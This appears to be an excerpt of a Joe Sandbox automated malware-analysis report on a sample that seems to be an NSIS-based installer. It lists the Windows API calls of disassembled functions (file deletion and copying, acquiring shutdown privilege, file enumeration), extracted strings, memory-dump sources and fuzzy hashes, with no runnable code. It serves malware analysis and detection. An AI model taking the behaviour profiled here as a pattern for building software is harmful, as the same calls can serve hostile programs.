lstrcmpiW.KERNEL32(00437800,00436800,00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
SetCurrentDirectoryW.KERNEL32(00437800,00437800,?,00000006,00000008,0000000A), ref: 0040388F
DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038E9
CopyFileW.KERNEL32(00438800,00420EE8,00000001,?,00000006,00000008,0000000A), ref: 004038FD
CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
OpenProcessToken.ADVAPI32(00000000), ref: 00403960
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
AdjustTokenPrivileges.ADVAPI32 ref: 00403998
ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
ExitProcess.KERNEL32 ref: 004039E0

Strings

Error launching installer, xrefs: 004037D0
TEMP, xrefs: 0040372D
Low, xrefs: 0040371B
~nsu, xrefs: 00403845
UXTHEME, xrefs: 004034F5, 004034FA, 00403500
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004034BC
NSIS Error, xrefs: 00403567
TMP, xrefs: 00403735
\Temp, xrefs: 004036FF
.tmp, xrefs: 00403861
SeShutdownPrivilege, xrefs: 0040396F

Memory Dump Source

Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
String ID: .tmp$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3441113951-334447862
Opcode ID: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
Opcode Fuzzy Hash: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E

Function 00404DCC Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404DE4
GetDlgItem.USER32(?,00000408), ref: 00404DEF
GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
LoadBitmapW.USER32(0000006E), ref: 00404E4C
SetWindowLongW.USER32(?,000000FC,004053C4), ref: 00404E65
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
DeleteObject.GDI32(00000000), ref: 00404EC2
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040500B
ShowWindow.USER32(?,00000005), ref: 0040501C
SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
ImageList_Destroy.COMCTL32(?), ref: 004051EC
GlobalFree.KERNEL32(?), ref: 004051FC
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
InvalidateRect.USER32(?,00000000,00000001), ref: 0040534D
ShowWindow.USER32(?,00000000), ref: 0040539B
GetDlgItem.USER32(?,000003FE), ref: 004053A6
ShowWindow.USER32(00000000), ref: 004053AD

Strings

M, xrefs: 00404F76
, xrefs: 00405385
N, xrefs: 00405057

Memory Dump Source

Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
Opcode Fuzzy Hash: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58

Function 00405AFA Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 148filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,00437800,76232EE0,00000000), ref: 00405B23
lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,00437800,76232EE0,00000000), ref: 00405B6B
lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,00437800,76232EE0,00000000), ref: 00405B8E
lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,00437800,76232EE0,00000000), ref: 00405B94
FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,00437800,76232EE0,00000000), ref: 00405BA4
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
FindClose.KERNEL32(00000000), ref: 00405C53

Strings

\*.*, xrefs: 00405B65
0WB, xrefs: 00405B53

Memory Dump Source

Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: 0WB$\*.*
API String ID: 2035342205-351390296
Opcode ID: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
Opcode Fuzzy Hash: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE

Function 00406AF2 Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45

Function 0040672B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00437800,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,76232EE0,00405B1A,?,00437800,76232EE0), ref: 00406736
FindClose.KERNEL32(00000000), ref: 00406742

Strings

xgB, xrefs: 0040672C

Memory Dump Source

Source File: 00000003.00000002.3360909913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3360866201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360941570.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3360972128.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3361016086.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_b5BQbAhwVD.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: xgB
API String ID: 2295610775-399326502
Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C

Function 3387DEE1 Relevance: 1.5, Strings: 1, Instructions: 273COMMON

Download Yara Rule

Strings

_6,, xrefs: 3387DEE9

Memory Dump Source

Source File: 00000003.00000002.3386149999.0000000033870000.00000040.00000800.00020000.00000000.sdmp, Offset: 33870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_33870000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID: _6,
API String ID: 0-4239174906
Opcode ID: 89c34edf7f32382e33816baf3c7f18fe4aa3c59fc26fd54aea906a3625de18c9
Instruction ID: a4f2bd16cf8c15ac19016c1044bfbc48c25e08a8ff54ed9f744798bc974ce0d1
Opcode Fuzzy Hash: 89c34edf7f32382e33816baf3c7f18fe4aa3c59fc26fd54aea906a3625de18c9
Instruction Fuzzy Hash: 5FC1B274E01218CFDB54DFA5C994B9DBBB2AF89300F2081A9D419BB365DB359E85CF10

Function 35AF7B4F Relevance: .6, Instructions: 608COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cc71eccf9eaedc8250b34f9a74ed4d13ba2bcc5c6dc0930c1d663e06c0b8a7a
Instruction ID: 2e62483f4961185091498d2fd346b1f05a4556503c5bc233d72ef49e8c6be328
Opcode Fuzzy Hash: 3cc71eccf9eaedc8250b34f9a74ed4d13ba2bcc5c6dc0930c1d663e06c0b8a7a
Instruction Fuzzy Hash: 3A629C74A01229CFDB65DF65C884BDDBBB2BB89301F1081E9E809A7355DB319E82DF50

Function 3387F042 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3386149999.0000000033870000.00000040.00000800.00020000.00000000.sdmp, Offset: 33870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_33870000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a732fbfc40af40d081e21f2e1d6ceea1dbe21982c57ebfb9969d68a77500cad4
Instruction ID: 949fd8ce16527b82cc62dddf01a5f8c12b87d38256f17fd49f507581673242a7
Opcode Fuzzy Hash: a732fbfc40af40d081e21f2e1d6ceea1dbe21982c57ebfb9969d68a77500cad4
Instruction Fuzzy Hash: 1CC1B174E01218CFDB54DFA9C994B9DBBB2BF89300F2081A9D419BB355DB359A86CF10

Function 3387B07F Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3386149999.0000000033870000.00000040.00000800.00020000.00000000.sdmp, Offset: 33870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_33870000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32cf52dfe4c2764293dcd45fd72d7af30b1d70d854755a11963987dca86ce064
Instruction ID: aac2f84e08d725f3c883bb306c397c1fe5d5ecf2be2b10b1164d8acca416ce69
Opcode Fuzzy Hash: 32cf52dfe4c2764293dcd45fd72d7af30b1d70d854755a11963987dca86ce064
Instruction Fuzzy Hash: B6C1B074E01218CFDB54DFA9C994B9DBBB2AF89300F2081A9D419BB355DB359A86CF10

Function 3387BD88 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3386149999.0000000033870000.00000040.00000800.00020000.00000000.sdmp, Offset: 33870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_33870000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd713ce6a81a1d07f0846585ec5a3d5f7f5c8256f0a5e29c89941e6bad2403a0
Instruction ID: 4e1f8b35293b856f14a190267966d6584c6099824041789333e7280ad989fef7
Opcode Fuzzy Hash: dd713ce6a81a1d07f0846585ec5a3d5f7f5c8256f0a5e29c89941e6bad2403a0
Instruction Fuzzy Hash: 77C1A174E01218CFDB54DFA9C994B9DBBB2AF89300F2081A9D409BB355DB359E86CF10

Function 3387E339 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3386149999.0000000033870000.00000040.00000800.00020000.00000000.sdmp, Offset: 33870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_33870000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04c0a1f0fb1ab16d3f2150953673014388ce3453aa01c79e4632c9650139a101
Instruction ID: 8185e0e8503cfbaaad8895bc16a2ff01080919180c2a9aae563c51eb424d034b
Opcode Fuzzy Hash: 04c0a1f0fb1ab16d3f2150953673014388ce3453aa01c79e4632c9650139a101
Instruction Fuzzy Hash: D2C1A074E01218CFDB54DFA9C994B9DBBB2AF89300F2081A9D419BB365DB359A85CF10

Function 3387DA89 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3386149999.0000000033870000.00000040.00000800.00020000.00000000.sdmp, Offset: 33870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_33870000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f087addd43d870863d2f758db98c2eb297aff4a54ff1d1c3c1573aac8b4a67a
Instruction ID: c81e5ef0379bb5ed895b2db5a2b71e9da8517d89e382eb10447340bd65df6d9a
Opcode Fuzzy Hash: 8f087addd43d870863d2f758db98c2eb297aff4a54ff1d1c3c1573aac8b4a67a
Instruction Fuzzy Hash: 45C1B074E01218CFEB54DFA5C994B9DBBB2BF89300F2081A9D419BB355DB359A85CF10

Function 35AF4DB0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 202ddc492ca191a497547ad8a8879bdd8b3f07ddcf76cfa82979c2c8681e8a54
Instruction ID: 3f3947c01020391d8f27f8e0f282db1df393994aba683d0dc2d6e72d2d17c9c4
Opcode Fuzzy Hash: 202ddc492ca191a497547ad8a8879bdd8b3f07ddcf76cfa82979c2c8681e8a54
Instruction Fuzzy Hash: AFC1B174E00218CFEB54DFA5C944B9DBBB2BF89300F2080A9D819BB355DB359A85CF50

Function 35AF2560 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03d1f4158063210da1ea947782565afe380b1d223bf6b4980d7001ecdc73f875
Instruction ID: 647f186083fc0bcd84ded0543c092e8d9d54459cbf847473e850bd9322b4b657
Opcode Fuzzy Hash: 03d1f4158063210da1ea947782565afe380b1d223bf6b4980d7001ecdc73f875
Instruction Fuzzy Hash: 1FC1A074E01218CFDB54DFA5C994B9DBBB2EF89300F6080A9D819BB355DB359A85CF10

Function 35AF1CB0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 600aa9e159601fbc3054df0425461081c7cce8c31b9005e162728ddbc7b45b8e
Instruction ID: e4254fc199f98899ad94b54c5bfa74b17cfbc6e6b3b9d1ed97353c9b7425751e
Opcode Fuzzy Hash: 600aa9e159601fbc3054df0425461081c7cce8c31b9005e162728ddbc7b45b8e
Instruction Fuzzy Hash: B9C1AF74E01218CFEB54DFA5C994B9DBBB2AF89300F2081A9D819BB355DB359E81CF50

Function 35AF74C8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03ec44cdbfc6842278c3c3664413adcaeb88f704bd417ef337827721f7e3f2df
Instruction ID: 2e4a7f36a1ee136f4e98492b0e45187db5a3060668f2f1548d1ab30679d65396
Opcode Fuzzy Hash: 03ec44cdbfc6842278c3c3664413adcaeb88f704bd417ef337827721f7e3f2df
Instruction Fuzzy Hash: 92C1B074E01218CFEB54DFA5C984B9DBBB2BF89301F2080A9D819BB355DB359A81CF50

Function 35AF6C18 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d57579cad98e957ac6cd87bb1904580454070f09f0f1fe4f2486753f6f1ca99
Instruction ID: 9b1c3f88feba0829096d5c21f946fb8a194a5246004834e60dade39b857438da
Opcode Fuzzy Hash: 7d57579cad98e957ac6cd87bb1904580454070f09f0f1fe4f2486753f6f1ca99
Instruction Fuzzy Hash: 3DC1A074E01218CFEB54DFA5C994B9DBBB2BF89300F2080A9D819BB355DB359A85CF50

Function 35AF0FA8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a1a3af4cb7fd3594ee3f2e7426c3f599ae0966fa2184efe6894a6c4943edada
Instruction ID: 6bdddf66d5be2f403b17415836ae43fcc6220f462be82c767f74c36858641e51
Opcode Fuzzy Hash: 5a1a3af4cb7fd3594ee3f2e7426c3f599ae0966fa2184efe6894a6c4943edada
Instruction Fuzzy Hash: F9C1B074E00258CFDB54DFA9C994B9DBBB2BF89300F2081A9D819BB355DB359A81CF10

Function 35AF67C0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 747b27a3532d44f78fe314bed45c5ee34e6c0f21a96fea3962446adc77b14bb0
Instruction ID: 014b0a9098af5a1af66a64883afd89274e4e09624f55299db435439a7ad784f3
Opcode Fuzzy Hash: 747b27a3532d44f78fe314bed45c5ee34e6c0f21a96fea3962446adc77b14bb0
Instruction Fuzzy Hash: 12C1B074E01218CFDB54DFA5C994B9DBBB2BF89300F2080A9D819BB355DB359A85CF50

Function 35AF5F10 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 105cb77ae9c2c053befc247107ece2fc51ca8e364a57b6c3c0fc982909a13228
Instruction ID: fe14fd00b62c24ff5e47e85b492c375f3c78c33555a08b1ceb93b7b1c482a631
Opcode Fuzzy Hash: 105cb77ae9c2c053befc247107ece2fc51ca8e364a57b6c3c0fc982909a13228
Instruction Fuzzy Hash: 19C1BF74E00218CFEB54DFA5C994B9DBBB2BF89300F2081A9D819BB355DB359A85CF50

Function 35AF3F70 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5aa11a8265b700666d80b0e8d9442b84bd270bee2c60152095d864aa3679d230
Instruction ID: 47d2c871bb92c451581d3dfb449100bc41e167d4bf7d1c4749c5d19b250da8ff
Opcode Fuzzy Hash: 5aa11a8265b700666d80b0e8d9442b84bd270bee2c60152095d864aa3679d230
Instruction Fuzzy Hash: 83C1B074E01218CFEB54DFA5C984B9DBBB2BF89300F2081A9D819BB355DB359A81CF10

Function 35AF36C0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0731757dd09c0aad9066fd2466d280bf88c2397042a5723638c07201678a18db
Instruction ID: dc2052fd0de763ff566c03445011cdcf511b62233b746caeabcf13189a7c9e11
Opcode Fuzzy Hash: 0731757dd09c0aad9066fd2466d280bf88c2397042a5723638c07201678a18db
Instruction Fuzzy Hash: 29C1A074E01218CFDB54DFA5C994B9DBBB2BF89300F2080A9D819BB355DB359A85CF10

Function 35AF2E10 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c798744edea41a170dce6c234fe1ffe0f6bfe48c9f8353c783e16e79db01ab
Instruction ID: 4f0baef7fac7e512d1b785f44165e16737d1bad9c049e4c7592b216f6314294d
Opcode Fuzzy Hash: 14c798744edea41a170dce6c234fe1ffe0f6bfe48c9f8353c783e16e79db01ab
Instruction Fuzzy Hash: 77C1A074E01218CFDB54DFA5C994B9DBBB2BF89300F2080A9D819BB355DB359A85CF10

Function 35AF5660 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e26876f7fa997545ae7ade70d7833dfc19183308a47dc07066d9a88065bac7fd
Instruction ID: a1495ada1620729e1516e9fbc83ac4e762109e2a444ce417324fb516e200f737
Opcode Fuzzy Hash: e26876f7fa997545ae7ade70d7833dfc19183308a47dc07066d9a88065bac7fd
Instruction Fuzzy Hash: 80C19074E01218CFDB54DFA5C994B9DBBB2BF89300F2080A9D819BB355DB359A85CF50

Function 35AF29B8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a34dcb29382b843336c5adb20ca8d3082e7009f195166dac2a5fedbc3fe87ed6
Instruction ID: af932709982bfafeccbead5f73f6cb589a6828ab307db984cb5cd852c289e14b
Opcode Fuzzy Hash: a34dcb29382b843336c5adb20ca8d3082e7009f195166dac2a5fedbc3fe87ed6
Instruction Fuzzy Hash: 89C19074E01218CFEB54DFA5C994B9DBBB2BF89300F2080A9D819BB355DB359A85CF50

Function 35AF2108 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ed7a42cbfc88fe1a1545c21d0c80c9f3fa4c217cc478209d2985d1db53af9f2
Instruction ID: 18265b04ea7e540aad390f3cd7fb862f9cac788e1c34c2969cb90f6047663073
Opcode Fuzzy Hash: 1ed7a42cbfc88fe1a1545c21d0c80c9f3fa4c217cc478209d2985d1db53af9f2
Instruction Fuzzy Hash: 44C19074E01218CFEB54DFA5C994B9DBBB2BF89300F2081A9D819BB355DB359A85CF10

Function 35AF4820 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab4c0f3b4079d720b4b4a8a303e183f89a228384c44c2869b2b4d134363d42af
Instruction ID: fceab3e7bf02e84e3a9cdee87c43fd57a4cc9de4f0fdf8e43903f07e8fc9c76c
Opcode Fuzzy Hash: ab4c0f3b4079d720b4b4a8a303e183f89a228384c44c2869b2b4d134363d42af
Instruction Fuzzy Hash: 66C1A074E00218CFDB54DFA5C994B9DBBB2BF89300F2081A9D819BB355DB359A86CF10

Function 35AF7070 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3388798653.0000000035AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_35af0000_b5BQbAhwVD.jbxd

Similarity

